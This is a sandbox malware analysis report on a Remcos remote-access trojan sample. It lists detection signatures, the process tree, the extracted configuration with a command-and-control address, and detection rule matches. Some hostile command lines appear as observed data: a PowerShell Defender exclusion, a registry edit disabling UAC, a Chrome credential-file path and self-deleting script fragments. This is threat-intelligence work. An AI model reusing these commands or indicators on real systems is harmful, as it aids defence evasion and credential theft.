Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1576998
MD5:065a6053492ecc989755413d4b9cffea
SHA1:9955cde6556837bc877e596c5b206df39d060a00
SHA256:be5fbed126be0685414464f8d18c42027cbb09c884640c35e2420f96c0d254df
Tags:NETexeMSILuser-jstrosch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4392 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 065A6053492ECC989755413D4B9CFFEA)
    • powershell.exe (PID: 2580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 5952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • DcBNSgyxoJFip.exe (PID: 4864 cmdline: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe MD5: 065A6053492ECC989755413D4B9CFFEA)
    • schtasks.exe (PID: 1280 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 3048 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T6WK9E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6b6f8:$a1: Remcos restarted by watchdog!
        • 0x6bc70:$a3: %02i:%02i:%02i:%03i
        0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
        • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x65a04:$str_b2: Executing file:
        • 0x6683c:$str_b3: GetDirectListeningPort
        • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x66380:$str_b7: \update.vbs
        • 0x65a2c:$str_b9: Downloaded file:
        • 0x65a18:$str_b10: Downloading file:
        • 0x65abc:$str_b12: Failed to upload file:
        • 0x66804:$str_b13: StartForward
        • 0x66824:$str_b14: StopForward
        • 0x662d8:$str_b15: fso.DeleteFile "
        • 0x6626c:$str_b16: On Error Resume Next
        • 0x66308:$str_b17: fso.DeleteFolder "
        • 0x65aac:$str_b18: Uploaded file:
        • 0x65a6c:$str_b19: Unable to delete:
        • 0x662a0:$str_b20: while fso.FileExists("
        • 0x65f49:$str_c0: [Firefox StoredLogins not found]
        Click to see the 22 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            12.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              12.2.MSBuild.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b6f8:$a1: Remcos restarted by watchdog!
              • 0x6bc70:$a3: %02i:%02i:%02i:%03i
              12.2.MSBuild.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
              • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x65a04:$str_b2: Executing file:
              • 0x6683c:$str_b3: GetDirectListeningPort
              • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x66380:$str_b7: \update.vbs
              • 0x65a2c:$str_b9: Downloaded file:
              • 0x65a18:$str_b10: Downloading file:
              • 0x65abc:$str_b12: Failed to upload file:
              • 0x66804:$str_b13: StartForward
              • 0x66824:$str_b14: StopForward
              • 0x662d8:$str_b15: fso.DeleteFile "
              • 0x6626c:$str_b16: On Error Resume Next
              • 0x66308:$str_b17: fso.DeleteFolder "
              • 0x65aac:$str_b18: Uploaded file:
              • 0x65a6c:$str_b19: Unable to delete:
              • 0x662a0:$str_b20: while fso.FileExists("
              • 0x65f49:$str_c0: [Firefox StoredLogins not found]
              Click to see the 28 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe, ParentImage: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe, ParentProcessId: 4864, ParentProcessName: DcBNSgyxoJFip.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp2A05.tmp", ProcessId: 1280, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", ProcessId: 5692, ProcessName: schtasks.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exe", ProcessId: 2580, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Scheduled temp file as task from temp location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4392, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DcBNSgyxoJFip" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5F.tmp", ProcessId: 5692, ProcessName: schtasks.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: 69 7B 63 7C 31 0D A6 FA AF 7C E7 E5 BD C2 17 5F 50 EB 46 A9 DF 8A 0B 84 F7 1E 25 1A 10 ED A9 AF ED B8 0C 52 7A 47 FB 83 8E 11 DD C0 A6 12 1D 4F 20 12 60 D4 3A 89 45 86 8B 68 B0 C5 5C 0D 45 D8 B7 56 56 6D 5E 61 2F CC 2A D6 A8 77 0F CF 6A 24 58 A5 D9 98 49 4E BE 04 40 C8 BB A8 16 33 6B 35 49 C0 0C 7A 4C 95 D9 08 73 8E B8 10 5A 57 FF 58 87 C7 06 FD , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 5952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-T6WK9E\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T20:38:09.344301+010020365941Malware Command and Control Activity Detected192.168.2.649711107.173.4.162560TCP
              2024-12-17T20:38:12.444320+010020365941Malware Command and Control Activity Detected192.168.2.649713107.173.4.162560TCP
              2024-12-17T20:38:15.518949+010020365941Malware Command and Control Activity Detected192.168.2.649716107.173.4.162560TCP
              2024-12-17T20:38:18.610683+010020365941Malware Command and Control Activity Detected192.168.2.649727107.173.4.162560TCP
              2024-12-17T20:38:21.715391+010020365941Malware Command and Control Activity Detected192.168.2.649734107.173.4.162560TCP
              2024-12-17T20:38:24.782070+010020365941Malware Command and Control Activity Detected192.168.2.649742107.173.4.162560TCP
              2024-12-17T20:38:27.881882+010020365941Malware Command and Control Activity Detected192.168.2.649754107.173.4.162560TCP
              2024-12-17T20:38:30.956422+010020365941Malware Command and Control Activity Detected192.168.2.649760107.173.4.162560TCP
              2024-12-17T20:38:34.048077+010020365941Malware Command and Control Activity Detected192.168.2.649771107.173.4.162560TCP
              2024-12-17T20:38:37.143338+010020365941Malware Command and Control Activity Detected192.168.2.649778107.173.4.162560TCP
              2024-12-17T20:38:40.216592+010020365941Malware Command and Control Activity Detected192.168.2.649787107.173.4.162560TCP
              2024-12-17T20:38:43.296588+010020365941Malware Command and Control Activity Detected192.168.2.649795107.173.4.162560TCP
              2024-12-17T20:38:46.391546+010020365941Malware Command and Control Activity Detected192.168.2.649801107.173.4.162560TCP
              2024-12-17T20:38:49.467800+010020365941Malware Command and Control Activity Detected192.168.2.649807107.173.4.162560TCP
              2024-12-17T20:38:52.545169+010020365941Malware Command and Control Activity Detected192.168.2.649819107.173.4.162560TCP
              2024-12-17T20:38:55.639326+010020365941Malware Command and Control Activity Detected192.168.2.649825107.173.4.162560TCP
              2024-12-17T20:38:58.751342+010020365941Malware Command and Control Activity Detected192.168.2.649836107.173.4.162560TCP
              2024-12-17T20:39:01.830463+010020365941Malware Command and Control Activity Detected192.168.2.649842107.173.4.162560TCP
              2024-12-17T20:39:05.201258+010020365941Malware Command and Control Activity Detected192.168.2.649847107.173.4.162560TCP
              2024-12-17T20:39:08.281636+010020365941Malware Command and Control Activity Detected192.168.2.649856107.173.4.162560TCP
              2024-12-17T20:39:11.357782+010020365941Malware Command and Control Activity Detected192.168.2.649862107.173.4.162560TCP
              2024-12-17T20:39:14.436701+010020365941Malware Command and Control Activity Detected192.168.2.649868107.173.4.162560TCP
              2024-12-17T20:39:17.534922+010020365941Malware Command and Control Activity Detected192.168.2.649876107.173.4.162560TCP
              2024-12-17T20:39:20.607286+010020365941Malware Command and Control Activity Detected192.168.2.649882107.173.4.162560TCP
              2024-12-17T20:39:23.685542+010020365941Malware Command and Control Activity Detected192.168.2.649891107.173.4.162560TCP
              2024-12-17T20:39:26.818834+010020365941Malware Command and Control Activity Detected192.168.2.649897107.173.4.162560TCP
              2024-12-17T20:39:29.893329+010020365941Malware Command and Control Activity Detected192.168.2.649905107.173.4.162560TCP
              2024-12-17T20:39:32.972717+010020365941Malware Command and Control Activity Detected192.168.2.649915107.173.4.162560TCP
              2024-12-17T20:39:36.088841+010020365941Malware Command and Control Activity Detected192.168.2.649920107.173.4.162560TCP
              2024-12-17T20:39:39.203367+010020365941Malware Command and Control Activity Detected192.168.2.649930107.173.4.162560TCP
              2024-12-17T20:39:42.305102+010020365941Malware Command and Control Activity Detected192.168.2.649937107.173.4.162560TCP
              2024-12-17T20:39:45.378722+010020365941Malware Command and Control Activity Detected192.168.2.649945107.173.4.162560TCP
              2024-12-17T20:39:48.456780+010020365941Malware Command and Control Activity Detected192.168.2.649953107.173.4.162560TCP
              2024-12-17T20:39:51.515278+010020365941Malware Command and Control Activity Detected192.168.2.649960107.173.4.162560TCP
              2024-12-17T20:39:54.514301+010020365941Malware Command and Control Activity Detected192.168.2.649969107.173.4.162560TCP
              2024-12-17T20:39:57.486941+010020365941Malware Command and Control Activity Detected192.168.2.649977107.173.4.162560TCP
              2024-12-17T20:40:00.438107+010020365941Malware Command and Control Activity Detected192.168.2.649983107.173.4.162560TCP
              2024-12-17T20:40:03.398647+010020365941Malware Command and Control Activity Detected192.168.2.649992107.173.4.162560TCP
              2024-12-17T20:40:06.319130+010020365941Malware Command and Control Activity Detected192.168.2.649998107.173.4.162560TCP
              2024-12-17T20:40:09.204763+010020365941Malware Command and Control Activity Detected192.168.2.650004107.173.4.162560TCP
              2024-12-17T20:40:12.072763+010020365941Malware Command and Control Activity Detected192.168.2.650010107.173.4.162560TCP
              2024-12-17T20:40:14.880802+010020365941Malware Command and Control Activity Detected192.168.2.650020107.173.4.162560TCP
              2024-12-17T20:40:17.655565+010020365941Malware Command and Control Activity Detected192.168.2.650026107.173.4.162560TCP
              2024-12-17T20:40:20.406464+010020365941Malware Command and Control Activity Detected192.168.2.650032107.173.4.162560TCP
              2024-12-17T20:40:23.143822+010020365941Malware Command and Control Activity Detected192.168.2.650033107.173.4.162560TCP
              2024-12-17T20:40:25.891579+010020365941Malware Command and Control Activity Detected192.168.2.650034107.173.4.162560TCP
              2024-12-17T20:40:28.628431+010020365941Malware Command and Control Activity Detected192.168.2.650035107.173.4.162560TCP
              2024-12-17T20:40:31.312218+010020365941Malware Command and Control Activity Detected192.168.2.650036107.173.4.162560TCP
              2024-12-17T20:40:34.145600+010020365941Malware Command and Control Activity Detected192.168.2.650037107.173.4.162560TCP
              2024-12-17T20:40:36.782135+010020365941Malware Command and Control Activity Detected192.168.2.650038107.173.4.162560TCP
              2024-12-17T20:40:39.486012+010020365941Malware Command and Control Activity Detected192.168.2.650039107.173.4.162560TCP
              2024-12-17T20:40:42.079096+010020365941Malware Command and Control Activity Detected192.168.2.650040107.173.4.162560TCP
              2024-12-17T20:40:44.655965+010020365941Malware Command and Control Activity Detected192.168.2.650041107.173.4.162560TCP
              2024-12-17T20:40:47.218645+010020365941Malware Command and Control Activity Detected192.168.2.650043107.173.4.162560TCP
              2024-12-17T20:40:49.767565+010020365941Malware Command and Control Activity Detected192.168.2.650044107.173.4.162560TCP
              2024-12-17T20:40:52.337409+010020365941Malware Command and Control Activity Detected192.168.2.650045107.173.4.162560TCP
              2024-12-17T20:40:54.879279+010020365941Malware Command and Control Activity Detected192.168.2.650046107.173.4.162560TCP
              2024-12-17T20:40:57.415006+010020365941Malware Command and Control Activity Detected192.168.2.650047107.173.4.162560TCP
              2024-12-17T20:40:59.906874+010020365941Malware Command and Control Activity Detected192.168.2.650048107.173.4.162560TCP
              2024-12-17T20:41:02.448953+010020365941Malware Command and Control Activity Detected192.168.2.650049107.173.4.162560TCP
              2024-12-17T20:41:04.969604+010020365941Malware Command and Control Activity Detected192.168.2.650050107.173.4.162560TCP
              2024-12-17T20:41:07.421853+010020365941Malware Command and Control Activity Detected192.168.2.650051107.173.4.162560TCP
              2024-12-17T20:41:09.929975+010020365941Malware Command and Control Activity Detected192.168.2.650052107.173.4.162560TCP
              2024-12-17T20:41:12.403413+010020365941Malware Command and Control Activity Detected192.168.2.650053107.173.4.162560TCP
              2024-12-17T20:41:14.832451+010020365941Malware Command and Control Activity Detected192.168.2.650054107.173.4.162560TCP
              2024-12-17T20:41:17.352648+010020365941Malware Command and Control Activity Detected192.168.2.650055107.173.4.162560TCP
              2024-12-17T20:41:19.750082+010020365941Malware Command and Control Activity Detected192.168.2.650057107.173.4.162560TCP
              2024-12-17T20:41:22.144892+010020365941Malware Command and Control Activity Detected192.168.2.650058107.173.4.162560TCP
              2024-12-17T20:41:24.517833+010020365941Malware Command and Control Activity Detected192.168.2.650059107.173.4.162560TCP
              2024-12-17T20:41:26.960949+010020365941Malware Command and Control Activity Detected192.168.2.650060107.173.4.162560TCP
              2024-12-17T20:41:29.321030+010020365941Malware Command and Control Activity Detected192.168.2.650061107.173.4.162560TCP
              2024-12-17T20:41:31.688833+010020365941Malware Command and Control Activity Detected192.168.2.650062107.173.4.162560TCP
              2024-12-17T20:41:34.018297+010020365941Malware Command and Control Activity Detected192.168.2.650063107.173.4.162560TCP
              2024-12-17T20:41:36.473112+010020365941Malware Command and Control Activity Detected192.168.2.650064107.173.4.162560TCP
              2024-12-17T20:41:38.785617+010020365941Malware Command and Control Activity Detected192.168.2.650065107.173.4.162560TCP
              2024-12-17T20:41:41.096857+010020365941Malware Command and Control Activity Detected192.168.2.650066107.173.4.162560TCP
              2024-12-17T20:41:43.391513+010020365941Malware Command and Control Activity Detected192.168.2.650067107.173.4.162560TCP
              2024-12-17T20:41:45.735941+010020365941Malware Command and Control Activity Detected192.168.2.650068107.173.4.162560TCP
              2024-12-17T20:41:48.065568+010020365941Malware Command and Control Activity Detected192.168.2.650069107.173.4.162560TCP
              2024-12-17T20:41:50.389077+010020365941Malware Command and Control Activity Detected192.168.2.650070107.173.4.162560TCP
              2024-12-17T20:41:52.656817+010020365941Malware Command and Control Activity Detected192.168.2.650071107.173.4.162560TCP
              2024-12-17T20:41:55.005009+010020365941Malware Command and Control Activity Detected192.168.2.650072107.173.4.162560TCP
              2024-12-17T20:41:57.272222+010020365941Malware Command and Control Activity Detected192.168.2.650073107.173.4.162560TCP
              2024-12-17T20:41:59.540967+010020365941Malware Command and Control Activity Detected192.168.2.650074107.173.4.162560TCP
              2024-12-17T20:42:01.786745+010020365941Malware Command and Control Activity Detected192.168.2.650075107.173.4.162560TCP
              2024-12-17T20:42:04.051787+010020365941Malware Command and Control Activity Detected192.168.2.650076107.173.4.162560TCP
              2024-12-17T20:42:06.517762+010020365941Malware Command and Control Activity Detected192.168.2.650077107.173.4.162560TCP
              2024-12-17T20:42:08.786445+010020365941Malware Command and Control Activity Detected192.168.2.650078107.173.4.162560TCP
              2024-12-17T20:42:11.000967+010020365941Malware Command and Control Activity Detected192.168.2.650079107.173.4.162560TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeAvira: detection malicious, Label: HEUR/AGEN.1305624
              Found malware configuration
              Source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T6WK9E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeReversingLabs: Detection: 39%
